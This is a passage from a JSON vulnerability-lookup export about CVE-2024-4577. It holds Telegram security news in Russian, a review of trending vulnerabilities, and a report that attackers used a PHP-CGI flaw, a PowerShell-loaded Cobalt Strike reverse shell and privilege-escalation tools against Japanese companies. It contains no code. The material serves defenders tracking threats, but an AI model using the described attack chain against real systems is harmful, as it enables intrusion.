"Telegram/9Mta-al6CFy3y1dgSB2UnkD0BlTbqM4va1CP18wQ-Xp_fXc", "content": "", "creation_timestamp": "2024-11-17T07:08:15.000000Z"}, {"uuid": "6f5ec2f6-f30d-4e8e-b838-311d085a5b7c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "published-proof-of-concept", "source": "Telegram/Ky05E6396nIlYVFtpQ8xzskIHO7Qm5PfY9zC47xohxss6ZM", "content": "", "creation_timestamp": "2024-11-16T15:26:08.000000Z"}, {"uuid": "98574f7d-886f-4262-948a-40f957790604", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "seen", "source": "https://t.me/itsec_news/4525", "content": "\u200b\u26a1\ufe0fCheck Point \u0438 Veeam \u043d\u0435 \u0443\u0441\u0442\u043e\u044f\u043b\u0438: \u043e\u0431\u0437\u043e\u0440 \u0442\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0437\u0430 \u0438\u044e\u043d\u044c\n\n\ud83d\udcac\u041a\u043e\u043c\u043f\u0430\u043d\u0438\u044f Positive Technologies \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043b\u0430 \u0441\u043f\u0438\u0441\u043e\u043a \u0434\u0435\u0432\u044f\u0442\u0438 \u043d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043e\u043f\u0430\u0441\u043d\u044b\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0432 \u043f\u0440\u043e\u0434\u0443\u043a\u0442\u0430\u0445 Microsoft, VMware, Linux, VPN-\u0448\u043b\u044e\u0437\u0435 \u043e\u0442 Check Point Software Technologies \u0438 \u0432 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u043c \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0438 Veeam Backup Enterprise Manager. \u042d\u0442\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043f\u043e \u043c\u043d\u0435\u043d\u0438\u044e \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u0438\u0441\u0442\u043e\u0432, \u043f\u0440\u0435\u0434\u0441\u0442\u0430\u0432\u043b\u044f\u044e\u0442 \u043d\u0430\u0438\u0431\u043e\u043b\u044c\u0448\u0443\u044e \u0443\u0433\u0440\u043e\u0437\u0443 \u0434\u043b\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0438\u043d\u0444\u0440\u0430\u0441\u0442\u0440\u0443\u043a\u0442\u0443\u0440 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439 \u0438 \u0442\u0440\u0435\u0431\u0443\u044e\u0442 \u043d\u0435\u043c\u0435\u0434\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0438\u043b\u0438 \u043f\u0440\u0438\u043d\u044f\u0442\u0438\u044f \u043a\u043e\u043c\u043f\u0435\u043d\u0441\u0438\u0440\u0443\u044e\u0449\u0438\u0445 \u043c\u0435\u0440.\n\n\u0422\u0440\u0435\u043d\u0434\u043e\u0432\u044b\u043c\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044f\u043c\u0438 \u0441\u0447\u0438\u0442\u0430\u044e\u0442\u0441\u044f \u0442\u0435 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438, \u043a\u043e\u0442\u043e\u0440\u044b\u0435 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0442\u0441\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c\u0438 \u0438\u043b\u0438 \u043c\u043e\u0433\u0443\u0442 \u0431\u044b\u0442\u044c \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u044b \u0432 \u0431\u043b\u0438\u0436\u0430\u0439\u0448\u0435\u0435 \u0432\u0440\u0435\u043c\u044f. \u0414\u043b\u044f \u0438\u0445 \u0432\u044b\u044f\u0432\u043b\u0435\u043d\u0438\u044f \u044d\u043a\u0441\u043f\u0435\u0440\u0442\u044b Positive Technologies \u0430\u043d\u0430\u043b\u0438\u0437\u0438\u0440\u0443\u044e\u0442 \u0434\u0430\u043d\u043d\u044b\u0435 \u0438\u0437 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0438\u0441\u0442\u043e\u0447\u043d\u0438\u043a\u043e\u0432: \u0431\u0430\u0437\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u0438 \u044d\u043a\u0441\u043f\u043b\u043e\u0439\u0442\u043e\u0432, \u0431\u044e\u043b\u043b\u0435\u0442\u0435\u043d\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u0435\u043d\u0434\u043e\u0440\u043e\u0432, \u0441\u043e\u0446\u0438\u0430\u043b\u044c\u043d\u044b\u0435 \u0441\u0435\u0442\u0438, \u0431\u043b\u043e\u0433\u0438 \u0438 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u043c-\u043a\u0430\u043d\u0430\u043b\u044b, \u043f\u0443\u0431\u043b\u0438\u0447\u043d\u044b\u0435 \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438 \u043a\u043e\u0434\u0430 \u0438 \u0434\u0440\u0443\u0433\u0438\u0435.\n\n\u041a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 Windows\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u043c\u0438 \u044f\u0432\u043b\u044f\u044e\u0442\u0441\u044f \u0442\u0440\u0438 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0435 \u0432 Windows. \u041e\u043d\u0438 \u043c\u043e\u0433\u0443\u0442 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u0442\u044c \u043e\u043a\u043e\u043b\u043e \u043c\u0438\u043b\u043b\u0438\u0430\u0440\u0434\u0430 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432 \u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0430\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043c\u0430\u043a\u0441\u0438\u043c\u0430\u043b\u044c\u043d\u044b\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435, \u0447\u0442\u043e \u043e\u0442\u043a\u0440\u044b\u0432\u0430\u0435\u0442 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f \u0430\u0442\u0430\u043a\u0438.\n\n1. CVE-2024-26229: \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 \u0434\u043b\u044f \u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u0430\u0432\u0442\u043e\u043d\u043e\u043c\u043d\u044b\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 Client-Side Caching (CSC) Windows. \u041e\u0448\u0438\u0431\u043a\u0430 \u0441\u0432\u044f\u0437\u0430\u043d\u0430 \u0441 \u043f\u0435\u0440\u0435\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u0431\u0443\u0444\u0435\u0440\u0430, \u0447\u0442\u043e \u043f\u0440\u0438\u0432\u043e\u0434\u0438\u0442 \u043a \u0437\u043b\u043e\u0432\u0440\u0435\u0434\u043d\u043e\u0439 \u043f\u0435\u0440\u0435\u0437\u0430\u043f\u0438\u0441\u0438 \u043f\u0430\u043c\u044f\u0442\u0438 \u0432 \u043a\u0443\u0447\u0435 (\u043e\u0442\u043d\u0435\u0441\u0435\u043d\u0430 \u0432 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044e CWE-122 ). ). \u042d\u0442\u043e \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0438\u0437-\u0437\u0430 \u043d\u0435\u043a\u043e\u0440\u0440\u0435\u043a\u0442\u043d\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u043f\u0430\u043c\u044f\u0442\u044c\u044e \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 \u043a\u044d\u0448\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f CSC. CVSS-\u043e\u0446\u0435\u043d\u043a\u0430: 7,8.\n\n2. CVE-2024-26169: \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 \u043e\u0442\u043f\u0440\u0430\u0432\u043a\u0438 \u0441\u043e\u043e\u0431\u0449\u0435\u043d\u0438\u0439 \u043e\u0431 \u043e\u0448\u0438\u0431\u043a\u0430\u0445 (Windows Error Reporting). \u041e\u043d\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u0441\u043b\u0443\u0436\u0431\u0435 \u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0430\u0446\u0438\u0438 \u043e\u0448\u0438\u0431\u043e\u043a Windows \u0438 \u043e\u043f\u0440\u0435\u0434\u0435\u043b\u0435\u043d\u0430 \u0432 \u043a\u0430\u0442\u0435\u0433\u043e\u0440\u0438\u044e CWE-269 . \u042d\u0442\u043e\u0442 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043e\u043a \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0441\u0432\u044f\u0437\u0430\u043d \u0441 \u0442\u0435\u043c, \u0447\u0442\u043e \u0441\u043b\u0443\u0436\u0431\u0430 \u043d\u0435\u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e \u043d\u0430\u0437\u043d\u0430\u0447\u0430\u0435\u0442, \u0438\u0437\u043c\u0435\u043d\u044f\u0435\u0442, \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442 \u0438\u043b\u0438 \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f, \u0438\u0437-\u0437\u0430 \u0447\u0435\u0433\u043e \u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432 \u043f\u043e\u044f\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0435\u0433\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c. CVSS-\u043e\u0446\u0435\u043d\u043a\u0430: 7,8.\n\n3. CVE-2024-30088: \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u044f\u0434\u0440\u0430 Windows, \u0432\u044b\u0437\u0432\u0430\u043d\u043d\u0430\u044f \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u043e\u043c \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u043e\u0434\u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b NtQueryInformationToken. \u041f\u0440\u043e\u0431\u043b\u0435\u043c\u0430 \u0432\u043e\u0437\u043d\u0438\u043a\u0430\u0435\u0442 \u0438\u0437-\u0437\u0430 \u043e\u0442\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u043f\u0440\u0430\u0432\u0438\u043b\u044c\u043d\u043e\u0439 \u0431\u043b\u043e\u043a\u0438\u0440\u043e\u0432\u043a\u0438 \u043f\u0440\u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0438 \u043e\u043f\u0435\u0440\u0430\u0446\u0438\u0439 \u043d\u0430\u0434 \u043e\u0431\u044a\u0435\u043a\u0442\u043e\u043c. CVSS-\u043e\u0446\u0435\u043d\u043a\u0430: 7,0.\n\n\u0414\u043b\u044f \u0443\u0441\u0442\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043f\u0435\u0440\u0435\u0447\u0438\u0441\u043b\u0435\u043d\u043d\u044b\u0445 \u0432\u044b\u0448\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 Microsoft \u0440\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u0442\u044c \u0441\u043e\u043e\u0442\u0432\u0435\u0442\u0441\u0442\u0432\u0443\u044e\u0449\u0438\u0435 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438: CVE-2024-26229 , CVE-2024-26169 , CVE-2024-30088 .\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 Linux \u0438 VMware\n\u0415\u0449\u0435 \u043e\u0434\u043d\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0431\u044b\u043b\u0430 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0430 \u0432 \u044f\u0434\u0440\u0435 Linux, \u0437\u0430\u0442\u0440\u0430\u0433\u0438\u0432\u0430\u044e\u0449\u0430\u044f \u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u043b\u0443\u0442\u043e\u0440\u0430 \u043c\u0438\u043b\u043b\u0438\u043e\u043d\u043e\u0432 \u0443\u0441\u0442\u0440\u043e\u0439\u0441\u0442\u0432.\n\n4. CVE-2024-1086: \u041e\u0448\u0438\u0431\u043a\u0430 \u0432 \u043f\u043e\u0434\u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043c\u0435\u0436\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u044d\u043a\u0440\u0430\u043d\u0430 netfilter \u044f\u0434\u0440\u0430 Linux \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u043f\u043e\u0432\u044b\u0441\u0438\u0442\u044c \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0438 \u0434\u043e \u0443\u0440\u043e\u0432\u043d\u044f root. \u042d\u0442\u043e \u043c\u043e\u0436\u0435\u0442 \u043f\u0440\u0438\u0432\u0435\u0441\u0442\u0438 \u043a \u0441\u0435\u0440\u044c\u0435\u0437\u043d\u044b\u043c \u043f\u043e\u0441\u043b\u0435\u0434\u0441\u0442\u0432\u0438\u044f\u043c \u0434\u043b\u044f \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0441\u0438\u0441\u0442\u0435\u043c\u044b. CVSS-\u043e\u0446\u0435\u043d\u043a\u0430: 7,8. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u043e\u0432\u0430\u043d\u043e \u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u044c \u0438\u043d\u0441\u0442\u0440\u0443\u043a\u0446\u0438\u0438 \u043d\u0430 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 kernel.org .\nVMware \u0442\u0430\u043a\u0436\u0435 \u043e\u043a\u0430\u0437\u0430\u043b\u0441\u044f \u043f\u043e\u0434 \u0443\u0434\u0430\u0440\u043e\u043c.\n\n5 \u0438 6. CVE-2024-37080 \u0438 CVE-2024-37079: \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 VMware vCenter, \u0441\u0432\u044f\u0437\u0430\u043d\u043d\u044b\u0435 \u0441 \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u043c \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u0435\u043c \u043a\u043e\u0434\u0430. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0435\u0439 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u043d\u0435\u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u0446\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u043e\u043c\u0443 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u0441\u0435\u0440\u0432\u0435\u0440\u0435 VMware vCenter \u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u0441\u0438\u0441\u0442\u0435\u043c\u043e\u0439 \u0441 \u0446\u0435\u043b\u044c\u044e \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f \u0430\u0442\u0430\u043a\u0438. \u042d\u0442\u0438 \u043d\u0435\u0434\u043e\u0441\u0442\u0430\u0442\u043a\u0438 \u0431\u0435\u0437\u043e\u043f\u0430\u0441\u043d\u043e\u0441\u0442\u0438 \u0432\u044b\u0437\u0432\u0430\u043d\u044b \u043e\u0448\u0438\u0431\u043a\u043e\u0439 \u0440\u0430\u0431\u043e\u0442\u044b \u0441 \u043f\u0430\u043c\u044f\u0442\u044c\u044e \u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 \u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0430 \u0441\u0438\u0441\u0442\u0435\u043c\u044b \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u0437\u043e\u0432\u0430 \u043f\u0440\u043e\u0446\u0435\u0434\u0443\u0440 DCE (RPC). CVSS-\u043e\u0446\u0435\u043d\u043a\u0430: 9,8. \u0420\u0435\u043a\u043e\u043c\u0435\u043d\u0434\u0443\u0435\u0442\u0441\u044f \u0441\u043a\u0430\u0447\u0430\u0442\u044c \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u0435 \u043d\u0430 \u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0439 \u0441\u0442\u0440\u0430\u043d\u0438\u0446\u0435 VMware.\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 PHP \u0438 VPN-\u0448\u043b\u044e\u0437\u0435 Check Point\n\u041a\u0440\u043e\u043c\u0435 \u0442\u043e\u0433\u043e, \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u044b \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u044f\u0437\u044b\u043a\u0435 PHP \u0438 VPN-\u0448\u043b\u044e\u0437\u0430\u0445 Check Point Software Technologies.\n\n7. CVE-2024-4577: \u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 \u044f\u0437\u044b\u043a\u0435 PHP \u043f\u0440\u0438 \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0438 Apache \u0438 PHP CGI \u0432 Windows. \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u0435\u0442 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0443 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u0443\u0434\u0430\u043b\u0435\u043d\u043d\u044b\u0439 \u043a\u043e\u0434 (remote code execution, RCE) \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0435. \u0412 \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442\u0435 \u043e\u043d \u043c\u043e\u0436\u0435\u0442 \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u043e\u043b\u043d\u044b\u0439 \u043a\u043e\u043d\u0442\u0440\u043e\u043b\u044c \u043d\u0430\u0434 \u043d\u0435\u0439 \u0441 \u0446\u0435\u043b\u044c\u044e \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0440\u0430\u0437\u0432\u0438\u0442\u0438\u044f \u0430\u0442\u0430\u043a\u0438.\n\n\ud83d\udd14 ITsec NEWS", "creation_timestamp": "2024-07-11T09:12:24.000000Z"}, {"uuid": "5e37dd8d-5420-43ee-8a6e-15f8403b2cea", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2024-4577", "type": "exploited", "source": "https://t.me/itsec_news/5432", "content": "\u200b\u26a1\ufe0f\u041e\u043f\u0435\u0440\u0430\u0446\u0438\u044f TaoWu: \u0445\u0430\u043a\u0435\u0440\u044b \u043f\u0440\u043e\u043d\u0438\u043a\u043b\u0438 \u0432 \u043f\u044f\u0442\u044c \u0441\u0442\u0440\u0430\u0442\u0435\u0433\u0438\u0447\u0435\u0441\u043a\u0438\u0445 \u043e\u0442\u0440\u0430\u0441\u043b\u0435\u0439 \u042f\u043f\u043e\u043d\u0438\u0438\n\n\ud83d\udcac \u0421 \u043d\u0430\u0447\u0430\u043b\u0430 2025 \u0433\u043e\u0434\u0430 \u0432 \u042f\u043f\u043e\u043d\u0438\u0438 \u0430\u043a\u0442\u0438\u0432\u0438\u0437\u0438\u0440\u043e\u0432\u0430\u043b\u0430\u0441\u044c \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430, \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043c\u0430\u044f \u043d\u0435\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u0439 \u0433\u0440\u0443\u043f\u043f\u043e\u0439 \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u043e\u0432, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u044e\u0449\u0438\u0445 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c CVE-2024-4577 . \u042d\u0442\u043e \u043a\u0440\u0438\u0442\u0438\u0447\u0435\u0441\u043a\u0430\u044f \u043e\u0448\u0438\u0431\u043a\u0430 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u0434\u0430 (RCE) \u0432 \u0440\u0435\u0430\u043b\u0438\u0437\u0430\u0446\u0438\u0438 PHP-CGI \u0434\u043b\u044f Windows, \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0430\u044f \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u043c \u043f\u043e\u043b\u0443\u0447\u0438\u0442\u044c \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u043c \u0436\u0435\u0440\u0442\u0432. \u041a\u0430\u043a \u0441\u043e\u043e\u0431\u0449\u0430\u044e\u0442 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Cisco Talos, \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u0430\u043a\u0442\u0438\u0432\u043d\u043e \u043f\u0440\u0438\u043c\u0435\u043d\u044f\u044e\u0442 \u043f\u043b\u0430\u0433\u0438\u043d\u044b Cobalt Strike \u043f\u043e\u0434 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435\u043c TaoWu \u0434\u043b\u044f \u043f\u043e\u0441\u0442\u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u043e\u043d\u043d\u044b\u0445 \u0434\u0435\u0439\u0441\u0442\u0432\u0438\u0439.\n\n\u041a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430 \u0437\u0430\u0442\u0440\u043e\u043d\u0443\u043b\u0430 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 \u0438\u0437 \u0440\u0430\u0437\u043b\u0438\u0447\u043d\u044b\u0445 \u0441\u0435\u043a\u0442\u043e\u0440\u043e\u0432, \u0432\u043a\u043b\u044e\u0447\u0430\u044f \u0442\u0435\u0445\u043d\u043e\u043b\u043e\u0433\u0438\u0438, \u0442\u0435\u043b\u0435\u043a\u043e\u043c\u043c\u0443\u043d\u0438\u043a\u0430\u0446\u0438\u0438, \u0440\u0430\u0437\u0432\u043b\u0435\u0447\u0435\u043d\u0438\u044f, \u043e\u0431\u0440\u0430\u0437\u043e\u0432\u0430\u043d\u0438\u0435 \u0438 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u0443\u044e \u043a\u043e\u043c\u043c\u0435\u0440\u0446\u0438\u044e. \u041f\u043e\u0441\u043b\u0435 \u043a\u043e\u043c\u043f\u0440\u043e\u043c\u0435\u0442\u0430\u0446\u0438\u0438 \u0430\u0442\u0430\u043a\u0443\u044e\u0449\u0438\u0435 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u044e\u0442 PowerShell-\u0441\u043a\u0440\u0438\u043f\u0442\u044b \u0434\u043b\u044f \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0438 \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0433\u043e HTTP-\u043e\u0431\u043e\u043b\u043e\u0447\u043a\u0438 Cobalt Strike, \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0438\u0432\u0430\u044f \u0441\u0435\u0431\u0435 \u0434\u043b\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u044b\u0439 \u0434\u043e\u0441\u0442\u0443\u043f \u043a \u0441\u0438\u0441\u0442\u0435\u043c\u0435.\n\n\u0414\u0430\u043b\u0435\u0435 \u0441\u043b\u0435\u0434\u0443\u044e\u0442 \u0440\u0430\u0437\u0432\u0435\u0434\u043a\u0430, \u043f\u043e\u0432\u044b\u0448\u0435\u043d\u0438\u0435 \u043f\u0440\u0438\u0432\u0438\u043b\u0435\u0433\u0438\u0439 \u0438 \u0433\u043e\u0440\u0438\u0437\u043e\u043d\u0442\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u043f\u043e \u0441\u0435\u0442\u0438 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u0438\u043d\u0441\u0442\u0440\u0443\u043c\u0435\u043d\u0442\u043e\u0432 JuicyPotato, RottenPotato, SweetPotato, Fscan \u0438 Seatbelt. \u0414\u043b\u044f \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u0438\u0441\u0443\u0442\u0441\u0442\u0432\u0438\u044f \u0437\u043b\u043e\u0443\u043c\u044b\u0448\u043b\u0435\u043d\u043d\u0438\u043a\u0438 \u043c\u043e\u0434\u0438\u0444\u0438\u0446\u0438\u0440\u0443\u044e\u0442 \u0440\u0435\u0435\u0441\u0442\u0440 Windows, 